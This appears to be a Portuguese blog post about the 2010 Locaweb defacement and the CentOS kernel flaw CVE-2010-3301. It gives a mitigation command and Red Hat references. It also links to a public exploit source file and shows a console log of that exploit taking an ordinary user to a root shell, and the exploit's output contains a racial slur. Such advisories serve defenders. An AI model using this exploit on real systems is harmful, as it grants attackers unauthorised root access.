Deface Locaweb , a brecha e a correção de segurança do CentOS – IA32 System Call Entry Point Vulnerability

Locaweb-20100917170827

Essa semana , com o evento  “Locaweb sofre ataque cracker” ficou conhecida a  IA32 System Call Entry Point Vulnerability do CentOS.

Se você tem um servidor com centOS  x86_64 rodando, pode executar um path de correção, facilmente: 

echo ‘:32bits:M:0:x7fELFx01::/bin/echo:’ > /proc/sys/fs/binfmt_misc/register

Dados da Falha:

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-3301
https://access.redhat.com/kb/docs/DOC-40265
Bug 634449 – (CVE-2010-3301) CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability

Exploit:

 http://sota.gen.nz/compat2/robert_you_suck.c

Exemplo de uso do exploit:

2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64 x86_64 x86_64
GNU/Linux
[[email protected] ~]$ id
uid=518(hacky) gid=518(hacky) groups=518(hacky)
[[email protected] ~]$ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.3.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t…
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 – F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=518(hacky) groups=518(hacky)

 

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *